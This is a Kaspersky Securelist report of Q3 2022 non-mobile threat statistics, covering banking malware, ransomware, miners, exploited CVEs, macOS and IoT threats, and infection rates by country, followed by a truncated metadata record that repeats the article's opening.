
* [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)
* **IT threat evolution in Q3 2022. Non-mobile statistics**
* [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)
_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._
## Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
* Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
* Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
* Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.
* Ransomware attacks were defeated on the computers of 72,941 unique users.
* Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.
## Financial threats
### Number of users attacked by banking malware
In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.
_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_
### TOP 10 banking malware families
| | **Name** | **Verdicts** | **%***
---|---|---|---
1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2
2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2
3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0
4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8
5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8
6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1
7 | RTM | Trojan-Banker.Win32.RTM | 1.9
8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4
9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4
10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1
_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._
### Geography of financial malware attacks
**TOP 10 countries and territories by share of attacked users**
| | **Country or territory*** | **%****
---|---|---
1 | Turkmenistan | 4.7
2 | Afghanistan | 4.6
3 | Paraguay | 2.8
4 | Tajikistan | 2.8
5 | Yemen | 2.3
6 | Sudan | 2.3
7 | China | 2.0
8 | Switzerland | 2.0
9 | Egypt | 1.9
10 | Venezuela | 1.8
_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._
_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._
## Ransomware programs
### Quarterly trends and highlights
The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leak to the personal initiative of one of their developers, not to the group being hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. As with other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy, [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.
Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over the SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.
The United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.
The creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.
### Number of new modifications
In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict Trojan-Ransom.Win32.Crypmod, which took sixth place in our rankings of the most widespread ransomware Trojans.
_Number of new ransomware modifications, Q3 2021 — Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_
### Number of users attacked by ransomware Trojans
In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.
_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_
### Geography of attacked users
**TOP 10 countries and territories attacked by ransomware Trojans**
| | **Country or territory*** | **%****
---|---|---
1 | Bangladesh | 1.66
2 | Yemen | 1.30
3 | South Korea | 0.98
4 | Taiwan | 0.77
5 | Mozambique | 0.64
6 | China | 0.52
7 | Colombia | 0.43
8 | Nigeria | 0.40
9 | Pakistan | 0.39
10 | Venezuela | 0.32
_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._
### TOP 10 most common families of ransomware Trojans
| | **Name** | **Verdicts*** | **Percentage of attacked users****
---|---|---|---
1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76
2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12
3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68
4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59
5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53
6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46
7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93
8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84
9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35
10 | Hive | Trojan-Ransom.Win32.Hive | 3.87
_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data._
_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._
## Miners
### Number of new miner modifications
In Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.
_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_
### Number of users attacked by miners
In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.
_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_
### Geography of miner attacks
**TOP 10 countries and territories attacked by miners**
| | **Country or territory*** | **%****
---|---|---
1 | Ethiopia | 2.38
2 | Kazakhstan | 2.13
3 | Uzbekistan | 2.01
4 | Rwanda | 1.93
5 | Tajikistan | 1.83
6 | Venezuela | 1.78
7 | Kyrgyzstan | 1.73
8 | Mozambique | 1.57
9 | Tanzania | 1.56
10 | Ukraine | 1.54
_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._
_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._
## Vulnerable applications used by criminals during cyberattacks
### Quarterly highlights
Q3 2022 was notable for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow privilege elevation in the system through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects the remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation.
Note that for most of the above vulnerabilities, the exploit must already have a foothold in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which exploit security flaws in the link handler to run commands remotely in the system.
Most of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. Attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system, in kernel context, by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which in theory allows remote exploitation of a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.
Two vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with a similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, etc.
### Vulnerability statistics
In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections — 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:
* [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;
* [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;
* [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;
* [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.
_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_
These were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:
* [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;
* [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;
* [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;
* [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.
Since many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.
A series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.
The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.
The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.
## Attacks on macOS
The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by the North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.
[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.
The creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.
In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.
In addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.
### TOP 20 threats for macOS
| | **Verdict** | **%***
---|---|---
1 | AdWare.OSX.Amc.e | 14.77
2 | AdWare.OSX.Pirrit.ac | 10.45
3 | AdWare.OSX.Agent.ai | 9.40
4 | Monitor.OSX.HistGrabber.b | 7.15
5 | AdWare.OSX.Pirrit.j | 7.10
6 | AdWare.OSX.Bnodlero.at | 6.09
7 | AdWare.OSX.Bnodlero.ax | 5.95
8 | Trojan-Downloader.OSX.Shlayer.a | 5.71
9 | AdWare.OSX.Pirrit.ae | 5.27
10 | Trojan-Downloader.OSX.Agent.h | 3.87
11 | AdWare.OSX.Bnodlero.bg | 3.46
12 | AdWare.OSX.Pirrit.o | 3.32
13 | AdWare.OSX.Agent.u | 3.13
14 | AdWare.OSX.Agent.gen | 2.90
15 | AdWare.OSX.Pirrit.aa | 2.85
16 | Backdoor.OSX.Twenbc.e | 2.85
17 | AdWare.OSX.Ketin.h | 2.82
18 | AdWare.OSX.Pirrit.gen | 2.69
19 | Trojan-Downloader.OSX.Lador.a | 2.52
20 | Downloader.OSX.InstallCore.ak | 2.28
_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._
As usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," took the top place for a second quarter in a row. This application displays fake system issue messages, offering the full version for purchase to fix them. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.
### Geography of threats for macOS
**TOP 10 countries and territories by share of attacked users**
| | **Country or territory*** | **%****
---|---|---
1 | France | 1.71
2 | Canada | 1.70
3 | Russia | 1.57
4 | India | 1.53
5 | United States | 1.52
6 | Spain | 1.48
7 | Australia | 1.36
8 | Italy | 1.35
9 | Mexico | 1.27
10 | United Kingdom | 1.24
_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._
France, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.
## IoT attacks
### IoT threat statistics
In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.
**Service** | **Share**
---|---
Telnet | 75.92%
SSH | 24.08%
_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_
A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.
**Service** | **Share**
---|---
Telnet | 97.53%
SSH | 2.47%
_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_
**TOP 10 threats delivered to IoT devices via Telnet**
| | **Verdict** | **%***
---|---|---
1 | Backdoor.Linux.Mirai.b | 28.67
2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63
3 | Backdoor.Linux.Mirai.ba | 11.63
4 | Backdoor.Linux.Mirai.cw | 10.94
5 | Backdoor.Linux.Gafgyt.a | 3.69
6 | Backdoor.Linux.Mirai.ew | 3.49
7 | Trojan-Downloader.Shell.Agent.p | 2.56
8 | Backdoor.Linux.Gafgyt.bj | 1.63
9 | Backdoor.Linux.Mirai.et | 1.17
10 | Backdoor.Linux.Mirai.ek | 1.08
_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._
Detailed IoT-threat statistics are published in the DDoS report for Q3 2022.
## Attacks via web resources
_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._
### Countries and territories that serve as sources of web-based attacks: TOP 10
_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._
_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._
In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.
_Distribution of web-attack sources by country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_
### Countries and territories where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.
Note that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.
| | **Country or territory*** | **%****
---|---|---
1 | Taiwan | 19.65
2 | Belarus | 17.01
3 | Serbia | 15.05
4 | Russia | 14.12
5 | Algeria | 14.01
6 | Turkey | 13.82
7 | Tunisia | 13.31
8 | Bangladesh | 13.30
9 | Moldova | 13.22
10 | Palestine | 12.61
11 | Yemen | 12.58
12 | Ukraine | 12.25
13 | Libya | 12.23
14 | Sri Lanka | 11.97
15 | Kyrgyzstan | 11.69
16 | Estonia | 11.65
17 | Hong Kong | 11.52
18 | Nepal | 11.52
19 | Syria | 11.39
20 | Lithuania | 11.33
_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._
On average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.
## Local threats
_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._
In Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.
### Countries and territories where users faced the highest risk of local infection
For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.
These rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.
| | **Country or territory*** | **%****
---|---|---
1 | Turkmenistan | 46.48
2 | Yemen | 45.12
3 | Afghanistan | 44.18
4 | Cuba | 40.48
5 | Tajikistan | 39.17
6 | Bangladesh | 37.06
7 | Uzbekistan | 37.00
8 | Ethiopia | 36.96
9 | South Sudan | 36.89
10 | Myanmar | 36.64
11 | Syria | 34.82
12 | Benin | 34.56
13 | Burundi | 33.91
14 | Tanzania | 33.05
15 | Rwanda | 33.03
16 | Chad | 33.01
17 | Venezuela | 32.79
18 | Cameroon | 32.30
19 | Sudan | 31.93
20 | Malawi | 31.88
_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._
On average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.
{"id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "vendorId": null, "type": "securelist", "bulletinFamily": "blog", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "description": "\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. Non-mobile statistics**\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 
| SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of financial malware attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). 
A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. 
